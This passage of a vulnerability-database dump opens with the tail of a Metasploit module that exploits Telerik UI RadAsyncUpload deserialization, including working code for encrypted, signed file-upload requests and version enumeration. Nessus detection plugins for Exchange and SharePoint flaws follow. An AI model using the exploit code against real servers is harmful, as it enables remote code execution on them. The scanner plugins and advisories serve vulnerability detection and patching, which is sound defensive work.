AllowedCustomMetaDataTypes setting is blocking the necessary code path\n fail_with(Failure::UnexpectedReply, 'Failed to execute the payload') if res&.code == 200\n end\n\n def upload_file(file_contents, version)\n target_folder = encrypt('')\n temp_target_folder = encrypt(datastore['DESTINATION'].encode('UTF-16LE'))\n if (version =~ /(\\d{4})\\.\\d+.\\d+/) && Regexp.last_match(1).to_i > 2016\n # signing is only necessary for versions >= 2017.1.118 (versions that don't match the regex don't require signing)\n target_folder << sign(target_folder)\n temp_target_folder << sign(temp_target_folder)\n end\n\n serialized_object = {\n 'TargetFolder' => target_folder,\n 'TempTargetFolder' => temp_target_folder,\n 'MaxFileSize' => 0,\n 'TimeToLive' => {\n 'Ticks' => 1440000000000,\n 'Days' => 0,\n 'Hours' => 40,\n 'Minutes' => 0,\n 'Seconds' => 0,\n 'Milliseconds' => 0,\n 'TotalDays' => 1.6666666666666665,\n 'TotalHours' => 40,\n 'TotalMinutes' => 2400,\n 'TotalSeconds' => 144000,\n 'TotalMilliseconds' => 144000000\n },\n 'UseApplicationPoolImpersonation' => false\n }\n serialized_object_type = \"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=#{version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4\"\n\n msg = rau_mime_payload(serialized_object, serialized_object_type, file_contents: file_contents)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }\n )\n fail_with(Failure::UnexpectedReply, 'The upload failed') unless res&.code == 200\n metadata = JSON.parse(decrypt(res.get_json_document.dig('metaData')).force_encoding('UTF-16LE'))\n dest_path = \"#{datastore['DESTINATION'].chomp('\\\\')}\\\\#{metadata['TempFileName']}\"\n print_good(\"Uploaded #{file_contents.length} bytes to: #{dest_path}\")\n register_file_for_cleanup(dest_path)\n end\n\n def rau_mime_payload(serialized_object, serialized_object_type, file_contents: '')\n metadata = { 'TotalChunks' => 1, 'ChunkIndex' => 0, 'TotalFileSize' => 1, 'UploadID' => dest_file_basename }\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(encrypt(serialized_object.to_json.encode('UTF-16LE')) + '&' + encrypt(serialized_object_type.encode('UTF-16LE')), nil, nil, 'form-data; name=\"rauPostData\"')\n post_data.add_part(file_contents, 'application/octet-stream', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{dest_file_basename}\\\"\")\n post_data.add_part(dest_file_basename, nil, nil, 'form-data; name=\"fileName\"')\n post_data.add_part('application/octet-stream', nil, nil, 'form-data; name=\"contentType\"')\n post_data.add_part('1970-01-01T00:00:00.000Z', nil, nil, 'form-data; name=\"lastModifiedDate\"')\n post_data.add_part(metadata.to_json, nil, nil, 'form-data; name=\"metadata\"')\n post_data\n end\n\n def enumerate_version\n print_status('Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect')\n File.open(File.join(Msf::Config.data_directory, 'wordlists', 'telerik_ui_asp_net_ajax_versions.txt'), 'rb').each_line do |version|\n version.strip!\n next if version.start_with?('#')\n\n vprint_status(\"Checking version: #{version}\")\n begin\n upload_file('', version)\n rescue Msf::Exploit::Failed\n next\n end\n\n print_good(\"The Telerik UI ASP.NET AJAX version has been identified as: #{version}\")\n return version\n end\n\n nil\n end\n\n #\n # Crypto Functions\n #\n def get_cipher(mode)\n # older versions might need to use pbkdf1\n blob = OpenSSL::PKCS5.pbkdf2_hmac_sha1(datastore['RAU_ENCRYPTION_KEY'], SALT, 1000, 48)\n cipher = OpenSSL::Cipher.new('AES-256-CBC').send(mode)\n cipher.key = blob.slice(0, 32)\n cipher.iv = blob.slice(32, 48)\n cipher\n end\n\n def decrypt(cipher_text)\n cipher = get_cipher(:decrypt)\n cipher.update(Rex::Text.decode_base64(cipher_text)) + cipher.final\n end\n\n def encrypt(plain_text)\n cipher = get_cipher(:encrypt)\n cipher_text = ''\n cipher_text << cipher.update(plain_text) unless plain_text.empty?\n cipher_text << cipher.final\n Rex::Text.encode_base64(cipher_text)\n end\n\n def sign(data)\n Rex::Text.encode_base64(OpenSSL::HMAC.digest('SHA256', datastore['RAU_SIGNING_KEY'], data))\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/telerik_rau_deserialization.rb"}], "nessus": [{"lastseen": "2020-10-17T09:47:00", "description": "The Microsoft Exchange Server installed on the remote host\nis missing a security update. It is, therefore, affected by\nthe following vulnerability :\n\n - A remote code execution vulnerability exists in\n Microsoft Exchange software when the software fails to\n properly handle objects in memory. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the System user. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts. Exploitation of the\n vulnerability requires that a specially crafted email be\n sent to a vulnerable Exchange server. The security\n update addresses the vulnerability by correcting how\n Microsoft Exchange handles objects in memory.\n (CVE-2020-16875)", "edition": 5, "cvss3": {"score": 7.2, "vector": "AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-09-08T00:00:00", "title": "Security Updates for Exchange (September 2020)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-16875"], "modified": "2020-09-08T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS20_SEP_EXCHANGE.NASL", "href": "https://www.tenable.com/plugins/nessus/140427", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140427);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/16\");\n\n script_cve_id(\"CVE-2020-16875\");\n script_xref(name:\"MSKB\", value:\"4577352\");\n script_xref(name:\"MSFT\", value:\"MS20-4577352\");\n script_xref(name:\"IAVA\", value:\"2020-A-0413-S\");\n\n script_name(english:\"Security Updates for Exchange (September 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host\nis missing a security update. It is, therefore, affected by\nthe following vulnerability :\n\n - A remote code execution vulnerability exists in\n Microsoft Exchange software when the software fails to\n properly handle objects in memory. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the System user. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts. Exploitation of the\n vulnerability requires that a specially crafted email be\n sent to a vulnerable Exchange server. The security\n update addresses the vulnerability by correcting how\n Microsoft Exchange handles objects in memory.\n (CVE-2020-16875)\");\n # https://support.microsoft.com/en-us/help/4577352/security-update-for-exchange-server-2019-and-2016\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9455d8ba\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4577352 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16875\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Exchange Server DlpUtils AddTenantDlpPolicy RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('misc_func.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-09';\nkb = '4577352'; # Exchange Server 2019 CU 5-6 / 2016 CU 16-17\n\nkbs = make_list(kb);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\ninstall = get_single_install(app_name:'Microsoft Exchange');\n\npath = install['path'];\nversion = install['version'];\nrelease = install['RELEASE'];\nport = kb_smb_transport();\n\nif (\n release != 151 &&\n release != 152\n) audit(AUDIT_INST_VER_NOT_VULN, 'Exchange', version);\n\nif (!empty_or_null(install['CU']))\n cu = install['CU'];\nif (!empty_or_null(install['SP']))\n sp = install['SP'];\n\nif (release == 151) # Exchange Server 2016\n{\n if (cu == 16)\n {\n fixedver = '15.1.1979.6';\n }\n else if (cu == 17)\n {\n fixedver = '15.1.2044.6';\n }\n else if (cu < 16)\n {\n unsupported_cu = TRUE;\n }\n}\nelse if (release == 152) # Exchange Server 2019\n{\n if (cu == 5)\n {\n fixedver = '15.2.595.6';\n }\n else if (cu == 6)\n {\n fixedver = '15.2.659.6';\n }\n else if (cu < 5)\n {\n unsupported_cu = TRUE;\n }\n}\n\nif ((fixedver && hotfix_is_vulnerable(path:hotfix_append_path(path:path, value:\"Bin\"), file:'ExSetup.exe', version:fixedver, bulletin:bulletin, kb:kb))\n || (unsupported_cu && report_paranoia == 2))\n{\n if (unsupported_cu)\n hotfix_add_report('The Microsoft Exchange Server installed at ' + path +\n ' has an unsupported Cumulative Update (CU) installed and may be ' +\n 'vulnerable to the CVEs contained within the advisory. Unsupported ' +\n 'Exchange CU versions are not typically included in Microsoft ' +\n 'advisories and are not indicated as affected.\\n',\n bulletin:bulletin, kb:kb);;\n\n set_kb_item(name:'SMB/Missing/' + bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n\n\n\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-05-23T04:39:34", "description": "Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability \nin the RadAsyncUpload function. This is exploitable when the encryption keys are known due to \nthe presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result \nin remote code execution. (As of 2020.1.114, a default setting prevents the exploit. \nIn 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)", "edition": 2, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-04-24T00:00:00", "title": "Telerik UI for ASP.NET AJAX RadAsyncUpload .NET Deserialization Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-18935", "CVE-2017-11317", "CVE-2017-11357"], "modified": "2020-04-24T00:00:00", "cpe": ["cpe:/a:telerik:ui_for_asp.net_ajax"], "id": "TELERIK_UI_FOR_ASPNET_AJAX_CVE-2019-18935.NASL", "href": "https://www.tenable.com/plugins/nessus/135970", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135970);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/22\");\n\n script_cve_id(\"CVE-2019-18935\");\n script_xref(name:\"IAVA\", value:\"2020-A-0219\");\n\n script_name(english:\"Telerik UI for ASP.NET AJAX RadAsyncUpload .NET Deserialization Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application development suite installed on the remote Windows\nhost is affected by a deserialization vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability \nin the RadAsyncUpload function. This is exploitable when the encryption keys are known due to \nthe presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result \nin remote code execution. (As of 2020.1.114, a default setting prevents the exploit. \nIn 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)\");\n # https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?de2ce6ef\");\n # https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?&_ga=2.224762457.29387225.1587722153-1707628900.1586272484#allowedcustommetadatatypes\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?be6fd178\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Telerik UI for ASP.NET AJAX version R3 2019 SP1\n(2019.3.1023) or later, and enable the type whitelisting feature of RadAsyncUpload.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-18935\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:telerik:ui_for_asp.net_ajax\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"telerik_ui_for_aspnet_ajax_installed.nbin\");\n script_require_keys(\"installed_sw/Telerik UI for ASP.NET AJAX\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('install_func.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\n\napp_name = 'Telerik UI for ASP.NET AJAX';\nopt_in = FALSE;\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\npath = install['path'];\n\n# 2020.1.114 and later have default settings available\nif (ver_compare(ver:version, fix:'2020.1.114.0', strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, path);\n\n# 2019.3.1023 has opt-in settings available, but not by default\nif ((ver_compare(ver:version, fix:'2019.3.1023', strict:FALSE) >= 0) &&\n (ver_compare(ver:version, fix:'2020.1.114.0', strict:FALSE) <= 0))\n{\n opt_in = TRUE;\n}\n\nif (opt_in)\n{\n # if version is 2019.3.1023 or higher, but lower than 2020.1.114.0, \n # type whitelisting feature of RadAsyncUpload needs to be enabled manually.\n # so if we're paranoid, we add a note to the report\n # (done below) and if we're not paranoid, we audit out\n if (report_paranoia < 2) audit(AUDIT_PARANOID);\n}\n\nport = get_kb_item('SMB/transport');\nif (empty_or_null(port))\n port = 445;\n\nreport = report_items_str(\n report_items:make_array(\n 'Path', path,\n 'Installed version', version,\n 'Fixed version', '2019.3.1023'\n ),\n ordered_fields:make_list('Path', 'Installed version', 'Fixed version')\n);\n\nif (opt_in)\n report += '\\n\\n' + 'Although the type whitelisting feature of RadAsyncUpload is available for this version,' +\n '\\n' + 'we are not able to determine if this is actually enabled. Following the advisory,' +\n '\\n' + 'you should ensure that this is the case.';\n\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-15T06:24:38", "description": "The Microsoft SharePoint Server 2016 installation on the\nremote host is missing security updates. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2020-16948,\n CVE-2020-16953)\n\n - A remote code execution vulnerability exists in\n Microsoft SharePoint when the software fails to check\n the source markup of an application package. An attacker\n who successfully exploited the vulnerability could run\n arbitrary code in the context of the SharePoint\n application pool and the SharePoint server farm account.\n Exploitation of this vulnerability requires that a user\n uploads a specially crafted SharePoint application\n package to an affected version of SharePoint. The\n security update addresses the vulnerability by\n correcting how SharePoint checks the source markup of\n application packages. (CVE-2020-16951, CVE-2020-16952)\n\n - This vulnerability is caused when SharePoint Server does\n not properly sanitize a specially crafted request to an\n affected SharePoint server. An authenticated attacker\n could exploit this vulnerability by sending a specially\n crafted request to an affected SharePoint server. The\n attacker who successfully exploited this vulnerability\n could then perform cross-site scripting attacks on\n affected systems and run script in the security context\n of the current user. These attacks could allow the\n attacker to read content that the attacker is not\n authorized to read, use the victim's identity to take\n actions on the SharePoint site on behalf of the victim,\n such as change permissions, delete content, steal\n sensitive information (such as browser cookies) and\n inject malicious content in the browser of the victim.\n For this vulnerability to be exploited, a user must\n click a specially crafted URL that takes the user to a\n targeted SharePoint Web App site. In an email attack\n scenario, an attacker could exploit the vulnerability by\n sending an email message containing the specially\n crafted URL to the user of the targeted SharePoint Web\n App site and convincing the user to click the specially\n crafted URL. (CVE-2020-16944)\n\n - A cross-site-scripting (XSS) vulnerability exists when\n Microsoft SharePoint Server does not properly sanitize a\n specially crafted web request to an affected SharePoint\n server. An authenticated attacker could exploit the\n vulnerability by sending a specially crafted request to\n an affected SharePoint server. The attacker who\n successfully exploited the vulnerability could then\n perform cross-site scripting attacks on affected systems\n and run script in the security context of the current\n user. The attacks could allow the attacker to read\n content that the attacker is not authorized to read, use\n the victim's identity to take actions on the SharePoint\n site on behalf of the user, such as change permissions\n and delete content, and inject malicious content in the\n browser of the user. The security update addresses the\n vulnerability by helping to ensure that SharePoint\n Server properly sanitizes web requests. (CVE-2020-16945,\n CVE-2020-16946)\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server improperly discloses its\n folder structure when rendering specific web pages. An\n attacker who took advantage of this information\n disclosure could view the folder path of scripts loaded\n on the page. To take advantage of the vulnerability, an\n attacker would require access to the specific SharePoint\n page affected by this vulnerability. The security update\n addresses the vulnerability by correcting how scripts\n are referenced on some SharePoint pages.\n (CVE-2020-16941, CVE-2020-16942)", "edition": 6, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-10-13T00:00:00", "title": "Security Updates for Microsoft SharePoint Server 2016 (October 2020)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-16941", "CVE-2020-16951", "CVE-2020-16945", "CVE-2020-16942", "CVE-2020-16953", "CVE-2020-16948", "CVE-2020-16946", "CVE-2020-16944", "CVE-2020-16952"], "modified": "2020-10-13T00:00:00", "cpe": ["cpe:/a:microsoft:sharepoint"], "id": "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2016.NASL", "href": "https://www.tenable.com/plugins/nessus/141436", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141436);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/13\");\n\n script_cve_id(\n \"CVE-2020-16941\",\n \"CVE-2020-16942\",\n \"CVE-2020-16944\",\n \"CVE-2020-16945\",\n \"CVE-2020-16946\",\n \"CVE-2020-16948\",\n \"CVE-2020-16951\",\n \"CVE-2020-16952\",\n \"CVE-2020-16953\"\n );\n script_xref(name:\"MSKB\", value:\"4486677\");\n script_xref(name:\"MSFT\", value:\"MS20-4486677\");\n script_xref(name:\"IAVA\", value:\"2020-A-0460-S\");\n\n script_name(english:\"Security Updates for Microsoft SharePoint Server 2016 (October 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft SharePoint Server 2016 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft SharePoint Server 2016 installation on the\nremote host is missing security updates. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2020-16948,\n CVE-2020-16953)\n\n - A remote code execution vulnerability exists in\n Microsoft SharePoint when the software fails to check\n the source markup of an application package. An attacker\n who successfully exploited the vulnerability could run\n arbitrary code in the context of the SharePoint\n application pool and the SharePoint server farm account.\n Exploitation of this vulnerability requires that a user\n uploads a specially crafted SharePoint application\n package to an affected version of SharePoint. The\n security update addresses the vulnerability by\n correcting how SharePoint checks the source markup of\n application packages. (CVE-2020-16951, CVE-2020-16952)\n\n - This vulnerability is caused when SharePoint Server does\n not properly sanitize a specially crafted request to an\n affected SharePoint server. An authenticated attacker\n could exploit this vulnerability by sending a specially\n crafted request to an affected SharePoint server. The\n attacker who successfully exploited this vulnerability\n could then perform cross-site scripting attacks on\n affected systems and run script in the security context\n of the current user. These attacks could allow the\n attacker to read content that the attacker is not\n authorized to read, use the victim's identity to take\n actions on the SharePoint site on behalf of the victim,\n such as change permissions, delete content, steal\n sensitive information (such as browser cookies) and\n inject malicious content in the browser of the victim.\n For this vulnerability to be exploited, a user must\n click a specially crafted URL that takes the user to a\n targeted SharePoint Web App site. In an email attack\n scenario, an attacker could exploit the vulnerability by\n sending an email message containing the specially\n crafted URL to the user of the targeted SharePoint Web\n App site and convincing the user to click the specially\n crafted URL. (CVE-2020-16944)\n\n - A cross-site-scripting (XSS) vulnerability exists when\n Microsoft SharePoint Server does not properly sanitize a\n specially crafted web request to an affected SharePoint\n server. An authenticated attacker could exploit the\n vulnerability by sending a specially crafted request to\n an affected SharePoint server. The attacker who\n successfully exploited the vulnerability could then\n perform cross-site scripting attacks on affected systems\n and run script in the security context of the current\n user. The attacks could allow the attacker to read\n content that the attacker is not authorized to read, use\n the victim's identity to take actions on the SharePoint\n site on behalf of the user, such as change permissions\n and delete content, and inject malicious content in the\n browser of the user. The security update addresses the\n vulnerability by helping to ensure that SharePoint\n Server properly sanitizes web requests. (CVE-2020-16945,\n CVE-2020-16946)\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server improperly discloses its\n folder structure when rendering specific web pages. An\n attacker who took advantage of this information\n disclosure could view the folder path of scripts loaded\n on the page. To take advantage of the vulnerability, an\n attacker would require access to the specific SharePoint\n page affected by this vulnerability. The security update\n addresses the vulnerability by correcting how scripts\n are referenced on some SharePoint pages.\n (CVE-2020-16941, CVE-2020-16942)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4486677\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4486677 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16952\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft SharePoint Server-Side Include and ViewState RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_sharepoint_installed.nbin\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('misc_func.inc');\ninclude('install_func.inc');\ninclude('lists.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-10';\n\nkbs = make_list(\n '4486677'\n);\n\nif (get_kb_item('Host/patch_management_checks'))\n hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated', exit_code:1);\n\n# Get path information for Windows.\nwindir = hotfix_get_systemroot();\nif (isnull(windir)) exit(1, 'Failed to determine the location of %windir%.');\n\nregistry_init();\n\ninstall = get_single_install(app_name:'Microsoft SharePoint Server');\n\nkb_checks =\n{\n '2016':\n { '0':\n {'Server':\n [{ \n 'kb' : '4486677',\n 'path' : hotfix_get_commonfilesdir(),\n 'append' : 'microsoft shared\\\\web server extensions\\\\16\\\\bin',\n 'file' : 'onetutil.dll',\n 'version' : '16.0.5071.1000',\n 'product_name' : 'Microsoft SharePoint Enterprise Server 2016'\n }]\n }\n }\n};\n\n# Get the specific product / path \nparam_list = kb_checks[install['Product']][install['SP']][install['Edition']];\n\n# audit if not affected\nif(isnull(param_list)) audit(AUDIT_INST_VER_NOT_VULN, 'Microsoft SharePoint Server');\n\nvuln = FALSE;\nxss = FALSE;\nport = kb_smb_transport();\n\n# grab the path otherwise\nforeach check (param_list)\n{\n \n if (!isnull(check['version']))\n {\n path = hotfix_append_path(path:check['path'], value:check['append']);\n\n are_we_vuln = hotfix_check_fversion(\n file:check['file'],\n version:check['version'],\n path:path,\n kb:check['kb'],\n product:check['product_name']\n );\n }\n else\n {\n report = '\\n';\n\n if (check['product_name'])\n report += ' Product : ' + check['product_name'] + '\\n';\n if (check['kb'])\n report += ' KB : ' + check['kb'] + '\\n';\n hotfix_add_report(report, kb:check['kb']);\n }\n\n if(are_we_vuln == HCF_OLDER)\n {\n vuln = TRUE;\n if (check['kb'] == '4486677') xss = TRUE;\n }\n}\n\nif (vuln)\n{\n port = kb_smb_transport();\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n if (xss) replace_kb_item(name:'www/' + port + '/XSS', value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-15T06:24:38", "description": "The Microsoft SharePoint Server 2019 installation on the\nremote host is missing security updates. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2020-16948,\n CVE-2020-16950, CVE-2020-16953)\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server improperly discloses its\n folder structure when rendering specific web pages. An\n attacker who took advantage of this information\n disclosure could view the folder path of scripts loaded\n on the page. To take advantage of the vulnerability, an\n attacker would require access to the specific SharePoint\n page affected by this vulnerability. The security update\n addresses the vulnerability by correcting how scripts\n are referenced on some SharePoint pages.\n (CVE-2020-16941, CVE-2020-16942)\n\n - A remote code execution vulnerability exists in\n Microsoft SharePoint when the software fails to check\n the source markup of an application package. An attacker\n who successfully exploited the vulnerability could run\n arbitrary code in the context of the SharePoint\n application pool and the SharePoint server farm account.\n Exploitation of this vulnerability requires that a user\n uploads a specially crafted SharePoint 